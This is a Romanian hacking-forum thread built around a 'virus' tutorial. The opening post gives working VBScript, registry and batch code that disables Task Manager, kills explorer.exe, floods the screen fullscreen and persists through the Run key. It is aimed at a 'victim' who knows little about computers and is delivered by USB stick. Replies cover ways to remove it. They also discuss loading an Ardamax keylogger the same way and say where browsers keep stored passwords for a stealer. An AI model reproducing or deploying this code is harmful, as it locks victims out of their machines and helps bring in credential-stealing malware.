Jump to content
Alexander33

[TuT]Visual Basic "Virus" :D

Recommended Posts

Description: Un Script destinat sa distruga...

Lucruri de care ai nevoie:

1.un creier

2.o persoana necunoscatoare in domeniul calculatoarelor

3.RABDARE....

EDIT:4[in special chestia asta]: WINDOWS XP/NT 2000/98 sau oricare windows care are vbscript alte OS-uri cum ar fi LINUX,MAC etc nu va merge pentru ca poate fi sters...si chiar si in windows cu Safe Mode desi nu este usor daca nu stii sa umblii in Registru[multumesc ptr toti care mi-au spus informatiile astea :D]

CUm Functioneaza:

Trimiti/Pui pe Stick Fisierele de mai jos si le trimiti/le pui in directorul C:\Windows

[nota pentru amatori dupa ce le copiati dati properties si Hidden.]

si rulati fisierul krima.reg si dati Ok

si la urmatorul restart victima va avea o surpriza neplacuta...

adica:

1.Task Manager nu va Merge...

2.Procesul Explorer.exe va fi inchis...

3.Arata smecher....[ca la matrix :cool:]

4.Nu poti sa scapi de script ca e in Startup...

5.Ca sa inchizi scriptul trebuie sa inchizi calculatorul...

Deci e Sah Mat...

PS: ori formateaza partitia C:\ ori reinstaleaza windows-ul...ori daca ati gasit voi o solutie sa scapati de asta spune-ti-mi si mie si o rezolv in cateva minute/ore/zile :))

Ce e mai Jos le scrieti separat fiecare intr-un notepad si le da-ti File>Save As cu numele Krima dar cu extensia diferita

adica :Krima.vbs ,Krima.reg

Krima.vbs

sub Matrix
dim variable
Set variable=CreateObject("WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")
temp=FSO.GetSpecialFolder(2)
Set File = FSO.OpenTextFile(temp &"\Matrix.bat", 2, True)
With File
.WriteLine "@echo off"
.WriteLine "@color 0a"
.WriteLine ":cmd"
.WriteLine "echo HACKOO %random% HACKOO %random% HACKOO %random% HACKOO %random %HACKOO %random% HACKOO %random% %random% HACKOO %random %HACKOO %random% HACKOO %random% HACKOO %random% HACKOO %random% %random% HACKOO %random% %random% HACKOO %random% HACKOO %random% %random% %random% %random% %random% %random% %random% %random% %random% HACKOO HACKOO %random% %random% %random% HACKOO %random% HACKOO %random% HACKOO%random% %random% %random% %random% HACKOO %random% HACKOO %random% %random% %random% HACKOO %random% %random% %random% %random% HACKOO %random% %random% %random% HACKOO %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% HACKOO %random% %random% %random% HACKOO %random% %random% %random% %random% %random% %random% %random% %random% %random% HACKOO %random% %random% HACKOO %random% %random% %random% %random% HACKOO %random% %random% %random% %random% %random% HACKOO %random% %random% %random% %random% %random% %random% %random% HACKOO %random% %random% %random% %random% HACKOO %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% HACKOO %random% HACKOO %random% %random% HACKOO %random% %random% %random% %random% %random% %random% %random% %random%"
.WriteLine "goto:cmd"
.Close
End With
variable.regWrite "HKEY_CURRENT_USER\Console\Fullscreen", "1", "REG_DWORD" ' To make the console in the Fullscreen
variable.run "Taskkill /IM Explorer.exe /F", 0 , True
wscript.sleep 2000
variable.run temp &"\Matrix.bat"
end sub
Set shell = CreateObject("Wscript.shell")
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
Matrix

Krima.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
" "="C:\\WINDWOS\\krima.vbs"

Am facut si un launcher.bat care copiaza automat fisierul krima.vbs in C:\Windows si fisierul krima trebuie sa fie in acelasi folder cu launcher-ul

salvati ca launch.bat[tot in notepad]

XCOPY "krima.vbs" "C:\" /D /E /C /R /I /K /Y 

CREDITS : Me&Hackoo pentru matrix script...

@@OFFTOPIC:Nytro sterge-mi postul,mai da-mi ban inca doua saptamani si inca un punct de penalizare ca am facut un tutorial....

Si ma intreb cat o sa dureze pana apare si pe alte site-uri cum ar fi INfo-hack[site de leecheri..]....

Edited by Alexander33
Link to comment
Share on other sites

din safe mode nu merge sa stergi ?

windows live cd

faci unu cu programul asta, apoi poti intra de pe livecd si poti sterge toate fisierele manual.

poti folosi si Ultimate Boot CD - Overview ca mediu live.

slax cred ca nu poate interactiona cu ntfs :-?(nu poate sterge dar poate citi)

backtrack ? (raspundeti voi aici, nu stiu daca are suport write ntfs)

Link to comment
Share on other sites

Hmmmm ia sa vedem ... ce zici de un live cd linux sa il stergi ? :) gen Knoppix sau altul.

Nu vreau sa ma intelegi gresit, e ok "virusul" e ok ca iti dai silinta si inveti, dar nu cred ca asta este scopul unui adevarat virus, sa distruga. In general toti urmaresc sa aiba acces la un PC sau sa fure date fara ca userul sa aiba habar.

Link to comment
Share on other sites

abea am inceput sa invat si eu... stealer fiind un fel de keylogger/trojan collector corect?

Un stealer in vb6 sau .NET nu mi se pare o idee buna dar daca vrei sa incerci cauta unde se salveaza parolele in diferite programe , browsere etc. (Mozilla , Ie , Yahoo Messenger , Steam , etc.)

Link to comment
Share on other sites

din safe mode nu merge sa stergi ?

windows live cd

faci unu cu programul asta, apoi poti intra de pe livecd si poti sterge toate fisierele manual.

poti folosi si Ultimate Boot CD - Overview ca mediu live.

slax cred ca nu poate interactiona cu ntfs :-?(nu poate sterge dar poate citi)

backtrack ? (raspundeti voi aici, nu stiu daca are suport write ntfs)

da am cam uitat de Safe Mode si am zis sa va alegeti o tinta necunoscatoare ;)

Daca facem acel launch.bat si in loc de fisierul krima punem virusul(serverul) de la Ardamax , credeti ca l-ar putea instala automat de pe stick?

Astept un raspuns va rog , ca m-ar interesa foarte mult

da merge, am incercat eu ;) o sa fac un TuT cum sa faci asta mai incolo

  • Downvote 1
Link to comment
Share on other sites

Esti sigur ca e facut de tine ????

Matrix Effect in Vbscript - Remote Administration Tool Research forum

==================================================

Google

==================================================

scz am uitat de cine era facut Matrix-ul si am editat si l-am pus si pe HACKOO

@@Begood si daca intri in Safe Mode atunci ce mai faci? daca victima nu stie unde e pus scriptul si mi se pare ca nu poti sa deschizi msconfig .... last solution regedit si cauti pana ti se face rau nu?

Edited by Alexander33
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...